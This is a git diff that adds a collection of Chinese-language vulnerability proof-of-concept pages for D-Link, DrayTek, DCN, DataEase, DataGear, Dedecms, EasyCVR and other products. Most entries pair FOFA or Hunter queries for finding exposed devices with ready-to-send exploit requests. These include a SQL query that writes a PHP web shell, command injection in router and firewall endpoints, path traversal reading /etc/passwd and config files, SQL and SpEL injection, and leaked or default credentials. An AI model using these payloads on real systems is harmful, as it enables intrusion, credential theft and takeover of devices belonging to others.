+D-Link DAR上网行为审计网关可以为企业提供完善的互联网访问行为管理解决方案，全面保护企业的运营效率和信息安全。DAR系列产品提供全面的应用识别和控制能力、精细化的应用层带宽管理能力、分类化的海量URL过滤能力、详尽的上网行为审计能力以及丰富的上网行为报表，从而帮助企业快速构建可视化、低成本以及高效安全的商业网络。D-Link上网行为管理系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。
+
+# 二、影响版本
++ D-Link DAR上网行为审计网关
+
+# 三、资产测绘
++ fofa`"mask.style.visibility" && title="D-Link"`
++ 特征
+
+![1701832949924-a46cf09a-99f8-4b58-8e99-12b6d2b32a9d.png](./img/nel9FO4sfySh_L2i/1701832949924-a46cf09a-99f8-4b58-8e99-12b6d2b32a9d-620160.png)
+
+# 四、漏洞复现
+通过poc写入文件
+
+```plain
+GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGVsbG9kbGluay5waHAn HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=8d3887c7a401d2f1bc1a58631fcfa6e7
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-IE;q=0.6,en-US;q=0.4,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1701833120150-01db148e-b38f-49f0-b719-9df0ca2e651a.png](./img/nel9FO4sfySh_L2i/1701833120150-01db148e-b38f-49f0-b719-9df0ca2e651a-347119.png)
+
+其中`c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvaGVsbG9kbGluay5waHAn`是`select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/hellodlink.php'`的`base64`编码。
+
+`0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e`为十六进制编码的字符串，表示以下代码
+
+```plain
+<?php echo system($_POST['cmd']);?>
+```
+
+写入文件位置
+
+```plain
+POST /app/hellodlink.php HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=8d3887c7a401d2f1bc1a58631fcfa6e7
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-IE;q=0.6,en-US;q=0.4,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+
+cmd=id
+```
+
+![1701833137853-b43067ed-7c29-4c0d-98cd-f3bb1eb417dc.png](./img/nel9FO4sfySh_L2i/1701833137853-b43067ed-7c29-4c0d-98cd-f3bb1eb417dc-690075.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qh15q6k18whqbdt8>
\ No newline at end of file
diff --git a/D-LinkDCS监控系统getuser存在密码泄露漏洞.md b/D-LinkDCS监控系统getuser存在密码泄露漏洞.md
new file mode 100644
index 0000000..9594629
--- /dev/null
+++ b/D-LinkDCS监控系统getuser存在密码泄露漏洞.md
@@ -0,0 +1,37 @@
+# D-Link DCS监控系统getuser存在密码泄露漏洞
+
+# 一、漏洞简介
+D-Link DCS是一款监控摄像机，成像色彩为彩色 是一款网络摄像机，该监控存在账号密码信息泄露漏洞，恶意攻击者可通过访问特定的URL可以得到账号密码信息，直接进入利用漏洞得到账户密码直接进入后台。
+
+# 二、影响版本
++ DCS-2530L
++ DCS-2670L
++ DCS-4603
++ DCS-4622
++ DCS-4701E
++ DCS-4703E
++ DCS-4705E
++ DCS-4802E
++ DCS-P703
+
+# 三、资产测绘
++ fofa`app="D_Link-DCS-4622"`
++ 特征
+
+![1708141509981-1360206a-2ef6-4c37-a777-af8adb962b91.png](./img/pO0XCtTI1eANRyj0/1708141509981-1360206a-2ef6-4c37-a777-af8adb962b91-700650.png)
+
+# 四、漏洞复现
+```java
+/config/getuser?index=0
+```
+
+![1708141554778-102e598d-4d56-43d1-baf4-6d1c6c1393cf.png](./img/pO0XCtTI1eANRyj0/1708141554778-102e598d-4d56-43d1-baf4-6d1c6c1393cf-090242.png)
+
+使用获取到的账号密码登录
+
+![1708141620644-665a2497-6af1-405f-b142-b2f83d7ef69c.png](./img/pO0XCtTI1eANRyj0/1708141620644-665a2497-6af1-405f-b142-b2f83d7ef69c-733347.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lv9ugvkave8utxf5>
\ No newline at end of file
diff --git a/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md b/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..67aaed2
--- /dev/null
+++ b/D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+D-Link下一代防火墙sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ D-Link下一代防火墙
+
+# 三、资产测绘
++ hunter`web.title=="D-Link下一代防火墙"`
++ 特征
+
+![1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373.png](./img/KG6VCY8j1nlRnvvQ/1701766678324-1f5557b7-3893-4c8d-a5df-8cf2ad6ad373-805129.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/KG6VCY8j1nlRnvvQ/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-398392.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/KG6VCY8j1nlRnvvQ/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-230075.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cw2r5v96hvhz36zk>
\ No newline at end of file
diff --git a/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md b/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md
new file mode 100644
index 0000000..4d12f17
--- /dev/null
+++ b/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md	
@@ -0,0 +1,22 @@
+# DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627)
+
+DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞，该漏洞源于存在不正确权限改造，允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。
+
+## fofa
+
+```javascript
+title="datagerry"
+```
+
+## poc
+
+```javascript
+使用浏览器请求
+http://x.x.x.x/rest/users/1/settings/
+```
+
+![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayZEcvDCD9ZyvQsiazHy93onsEwibwTxOpUdOlibggicpUTe1zK33DonibzZg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1)
+
+
+![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayeAddRKdNr6NiaDNnbicSibT9iapIMV75HbdicG8feHLBTytTVM7lVIdT0icw/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1)
+
diff --git a/DCN防火墙ping.php存在命令执行漏洞.md b/DCN防火墙ping.php存在命令执行漏洞.md
new file mode 100644
index 0000000..eaf268f
--- /dev/null
+++ b/DCN防火墙ping.php存在命令执行漏洞.md
@@ -0,0 +1,29 @@
+# DCN防火墙ping.php存在命令执行漏洞
+
+
+
+## fofa
+
+```javascript
+body="北京神州数码云科信息技术有限公司" && title=="Web Management"
+```
+
+## poc
+
+```javascript
+POST /function/system/tool/ping.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 107
+Connection: close
+Cookie: cookie
+Upgrade-Insecure-Requests: 1
+Priority: u=4
+
+dcn_test_a_967=21&dcn_test_b_967=122&dcn_test_c_967=111&dcn_test_d=_967&doing=ping&host=1;ps&proto=&count=1
+```
+
diff --git a/DVR设备存在敏感信息泄露.md b/DVR设备存在敏感信息泄露.md
new file mode 100644
index 0000000..cde3eea
--- /dev/null
+++ b/DVR设备存在敏感信息泄露.md
@@ -0,0 +1,33 @@
+# DVR设备存在敏感信息泄露
+
+# 一、漏洞简介
+DVR（数字视频录像机）设备中，包括 TVT、Provision-ISR、AVISION 等品牌的机型。DVR设备存在敏感信息泄露
+
+# 二、影响版本
++ DVR
+
+# 三、资产测绘
++ fofa`icon_hash="492290497"`
++ 特征
+
+![1727149378553-971d331b-6e62-4b21-ab6e-c4b8e03f3a3e.png](./img/gVa4We2SG_G-RXJD/1727149378553-971d331b-6e62-4b21-ab6e-c4b8e03f3a3e-936281.png)
+
+# 四 、漏洞复现
+```java
+POST /queryDevInfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Language: en-US,en;q=0.9
+Accept-Encoding": gzip, deflate
+Accept: */*
+Connection: keep-alive
+
+<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>
+```
+
+![1727149406676-6a2a733e-7d04-4505-b9d1-dd1b57cd3a6b.png](./img/gVa4We2SG_G-RXJD/1727149406676-6a2a733e-7d04-4505-b9d1-dd1b57cd3a6b-731482.png)
+
+
+
+> 更新: 2024-10-22 09:40:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/og9o95nb4rdos806>
\ No newline at end of file
diff --git a/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md b/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md
new file mode 100644
index 0000000..9c8744c
--- /dev/null
+++ b/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md
@@ -0,0 +1,21 @@
+# DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269)
+
+DataEase是一个开源数据可视化和分析工具，在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问`/de2api/engine/getEngine;.js`路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复，除了升级之外，没有已知的解决方法。
+
+## fofa
+
+```javascript
+body="Dataease"
+```
+
+## poc
+
+```javascript
+/de2api/engine/getEngine;.js
+```
+
+![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409251726851.png)
+
+## 漏洞来源
+
+- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
\ No newline at end of file
diff --git a/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md b/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md
new file mode 100644
index 0000000..39302a2
--- /dev/null
+++ b/DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759).md
@@ -0,0 +1,43 @@
+# DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759)
+
+DataGear 5.0.0 及更早版本存在 SpEL 表达式注入漏洞，可导致远程代码执行。
+
+## poc
+
+### 准备恶意数据库表
+
+```sql
+CREATE DATABASE evil;
+
+CREATE TABLE `evil` (
+  `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
+
+INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}");
+```
+
+### 第二步：添加恶意数据库源
+
+1. 1. 登录 [http://localhost:50401](http://localhost:50401/)，默认账号密码为 admin/admin。
+2. 1. 在架构添加界面中添加此 MySQL 数据库：`/schema/saveAdd`。
+3. 1. 选择"数据源"—"数据源添加"，填写刚才创建的恶意数据库地址。
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409200954552.png)
+
+### 第三步：触发漏洞执行代码
+
+打开刚才添加的数据库，然后单击"查看"按钮，将执行 SpEL 表达式。
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409200954385.png)
+
+
+
+## 漏洞脚本
+
+https://github.com/crumbledwall/CVE-2024-37759_PoC/
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/590
\ No newline at end of file
diff --git a/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md b/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md
new file mode 100644
index 0000000..caec748
--- /dev/null
+++ b/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md
@@ -0,0 +1,10 @@
+# DeDecms接口sys_verifies.php存在任意文件读取漏洞
+
+需前台注册用户权限。
+
+## poc
+
+```java
+http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd
+```
+
diff --git a/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md b/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md
new file mode 100644
index 0000000..eb179ea
--- /dev/null
+++ b/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md
@@ -0,0 +1,24 @@
+
+## Dedecms v5.7.111前台tags.php SQL注入漏洞
+
+
+## 影响版本：
+```
+v5.7.111，或打补丁的历史版本
+```
+
+## poc
+```
+http://x.com/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1union%20select%201,2,3,4,5,6,7,8,9,10,11--%20\\
+
+/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/568076a5-4ad2-4cf6-89a4-60d02d464222)
+
+## 笛卡尔积 盲注
+```
+/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\
+```
+当 admin表userid 存在admin时，响应时间为下图右下角的 5539 ms
+![image](https://github.com/wy876/POC/assets/139549762/ac170e5f-a085-4dc6-affb-94ffb99f69d8)
diff --git a/DockerUI存在弱口令漏洞.md b/DockerUI存在弱口令漏洞.md
new file mode 100644
index 0000000..6c54cb8
--- /dev/null
+++ b/DockerUI存在弱口令漏洞.md
@@ -0,0 +1,17 @@
+# DockerUI存在弱口令漏洞
+DockerUI是一款开源的、强大的、轻量级的Docker管理工具。DockerUI覆盖了 docker cli 命令行 95% 以上的命令功能，通过可视化的界面，即使是不熟悉docker命令的用户也可以非常方便的进行Docker和Docker Swarm集群进行管理和维护。
+
+## fofa
+```javascript
+"static/common/js/ui.js"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733724458922-5e7e71e5-70c8-412f-98a3-33fe85af2e92.png)
+
+## poc
+```java
+ginghan/123456
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733724482416-c8af339c-f4e7-424e-a4b8-48d7c01af37c.png)
+
diff --git a/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md b/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md
new file mode 100644
index 0000000..759229f
--- /dev/null
+++ b/DraytekVigor2960路由器mainfunction任意文件读取漏洞.md
@@ -0,0 +1,38 @@
+# Draytek Vigor 2960 路由器mainfunction任意文件读取漏洞
+
+# 一、漏洞简介
+DrayTek是中国台湾的一家网络设备制造商，其产品包括VPN路由器、管理型交换机、无线AP和管理系统等，并被中小型企业广泛使用。Vigor2960 v1.5.1.4 存在任意文件读取漏洞。攻击者可通过该漏洞读取泄露源码、数据库配置文件等等，导致网站处于极度不安全状态。
+
+# 二、影响版本
++ Draytek Vigor 2960 路由器
+
+# 三、资产测绘
++ fofa`title="Vigor 2960"`
++ 特征
+
+![1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669.png](./img/R0YfAHe-kmHOBLwK/1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669-474159.png)
+
+# 四、漏洞复现
+```plain
+POST /cgi-bin/mainfunction.cgi HTTP/1.1
+Host: 
+Connection: close
+Content-Length: 94
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+
+action=getSyslogFile&option=../../etc/passwd
+```
+
+![1712338332725-35d5ddf9-fa88-4390-97cc-8f17ed0856e9.png](./img/R0YfAHe-kmHOBLwK/1712338332725-35d5ddf9-fa88-4390-97cc-8f17ed0856e9-576924.png)
+
+
+
+> 更新: 2024-04-16 16:55:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hg8ng5hsagblmd2p>
\ No newline at end of file
diff --git a/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md b/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md
new file mode 100644
index 0000000..0077f55
--- /dev/null
+++ b/DraytekVigor2960路由器mainfunction远程命令执行漏洞.md
@@ -0,0 +1,38 @@
+# Draytek Vigor 2960 路由器mainfunction远程命令执行漏洞
+
+# 一、漏洞简介
+DrayTek是中国台湾的一家网络设备制造商，其产品包括VPN路由器、管理型交换机、无线AP和管理系统等，并被中小型企业广泛使用。DrayTek路由器系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。
+
+# 二、影响版本
++ Draytek Vigor 2960 路由器
+
+# 三、资产测绘
++ fofa`title="Vigor 2960"`
++ 特征
+
+![1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669.png](./img/N3A3GtuyXXzMteX0/1712337973165-ab3cdc42-6e45-43c7-9fb9-932163c6c669-423929.png)
+
+# 四、漏洞复现
+```plain
+POST /cgi-bin/mainfunction.cgi HTTP/1.1
+Host: 
+Connection: close
+Content-Length: 94
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
+Content-Type: text/plain; charset=UTF-8
+Accept: */*
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+
+action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%26id%0A%27&loginUser=a&loginPwd=a
+```
+
+![1712337999670-1deeeb58-a1eb-4b2f-b5c7-9d53ccbe7d17.png](./img/N3A3GtuyXXzMteX0/1712337999670-1deeeb58-a1eb-4b2f-b5c7-9d53ccbe7d17-818968.png)
+
+
+
+> 更新: 2024-04-16 16:55:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgi97gptaomg6blr>
\ No newline at end of file
diff --git a/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md b/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md
new file mode 100644
index 0000000..feaee72
--- /dev/null
+++ b/EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞
+
+EDU智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="custom/blue/uimaker/easyui.css"
+```
+
+## poc
+
+```javascript
+POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240923093100931](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230931999.png)
\ No newline at end of file
diff --git a/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md b/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md
new file mode 100644
index 0000000..49f83f7
--- /dev/null
+++ b/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞
+
+EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="custom/blue/uimaker/easyui.css"
+```
+
+## poc
+
+```javascript
+GET /ExpDownloadService.aspx?DownfilePath=/web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
diff --git a/EOVA未授权doInit接口存在反序列化漏洞.md b/EOVA未授权doInit接口存在反序列化漏洞.md
new file mode 100644
index 0000000..3ff25f7
--- /dev/null
+++ b/EOVA未授权doInit接口存在反序列化漏洞.md
@@ -0,0 +1,39 @@
+# EOVA未授权doInit接口存在反序列化漏洞
+
+EOVA存在JDBC反序列化漏洞，由于JDBC连接mysql服务器的时候，参数完全可控，可传入恶意配置和恶意mysql服务器地址，导致反序列化漏洞。攻击者可利用该漏洞执行任意命令。
+
+## fofa
+
+```yaml
+icon_hash="-1699356011"
+```
+
+## poc
+
+```javascript
+POST /doInit HTTP/1.1  
+Host:   
+Sec-Fetch-Dest: document  
+Cache-Control: max-age=0  
+Sec-Fetch-User: ?1  
+Sec-Fetch-Site: none  
+sec-ch-ua-mobile: ?0  
+sec-ch-ua-platform: "Windows"  
+Accept-Language: zh-CN,zh;q=0.9  
+Sec-Fetch-Mode: navigate  
+Cookie: JSESSIONID=1diwaoe2lud2k1w5bzj9gy0r9v; _jfinal_captcha=ec1807bb391d443f9730b7b18384157a  
+sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"  
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36  
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
+Accept-Encoding: gzip, deflate, br, zstd  
+Upgrade-Insecure-Requests: 1  
+Content-Type: application/x-www-form-urlencoded
+
+ip=127.0.0.1:3333%2Ftest%3FautoDeserialize=true%26statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%26user=URLDNS%26Yu9=Yu9%23&port=&username=root&password=123456
+```
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/560
\ No newline at end of file
diff --git a/EasyCVR-视频管理平台存在用户信息泄露.md b/EasyCVR-视频管理平台存在用户信息泄露.md
new file mode 100644
index 0000000..b2d5db3
--- /dev/null
+++ b/EasyCVR-视频管理平台存在用户信息泄露.md
@@ -0,0 +1,14 @@
+## EasyCVR 视频管理平台存在用户信息泄露
+EasyCVR 智能视频监控综合管理平台是一种针对大中型用户在跨区域网络化视频监控集中管理领域的安防管理软件。它具备多项功能，包括信息资源管理、设备管理、用户管理、网络管理和安全管理。该平台能够实现监控中心对所有视频监控图像的集中管理，并支持多个品牌设备的联网，确保联网视频监控传输质量，并提供资源统一检索和数据共享的功能。
+
+## fofa
+```
+title="EasyCVR"
+```
+
+## poc
+```
+/api/v1/userlist?pageindex=0&pagesize=10
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/cc8c8dd3-bd7e-49a9-b22f-a6a97215cf6a)
diff --git a/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md b/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md
new file mode 100644
index 0000000..4683f5b
--- /dev/null
+++ b/EasyCVR视频管理平台taillog任意文件读取漏洞 2.md	
@@ -0,0 +1,23 @@
+# EasyCVR视频管理平台taillog任意文件读取漏洞
+
+EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+app="EasyCVR-视频管理平台"
+```
+
+## poc
+
+```javascript
+GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241211213020522](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112130594.png)
\ No newline at end of file
diff --git a/EasyCVR视频管理平台taillog任意文件读取漏洞.md b/EasyCVR视频管理平台taillog任意文件读取漏洞.md
new file mode 100644
index 0000000..4683f5b
--- /dev/null
+++ b/EasyCVR视频管理平台taillog任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# EasyCVR视频管理平台taillog任意文件读取漏洞
+
+EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+app="EasyCVR-视频管理平台"
+```
+
+## poc
+
+```javascript
+GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241211213020522](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112130594.png)
\ No newline at end of file
diff --git a/EasyImagedown.php任意文件读取漏洞.md b/EasyImagedown.php任意文件读取漏洞.md
new file mode 100644
index 0000000..7871abd
--- /dev/null
+++ b/EasyImagedown.php任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# EasyImage down.php 任意文件读取漏洞
+
+# 一、漏洞简介
+EasyImage：一个简洁的开源图床程序，支持多文件上传,简单无数据库,返回图片url,markdown,bbscode,html的一款图床程序。EasyImage down.php处存在任意文件读取漏洞。
+
+# 二、影响版本
++ EasyImage
+
+# 三、资产测绘
++ fofa`app="EasyImage-简单图床"`
++ 特征
+
+![1707125244360-cc612d17-1933-4111-a35d-07b9aad451e9.png](./img/Drmx3enNJaW6hyss/1707125244360-cc612d17-1933-4111-a35d-07b9aad451e9-049032.png)
+
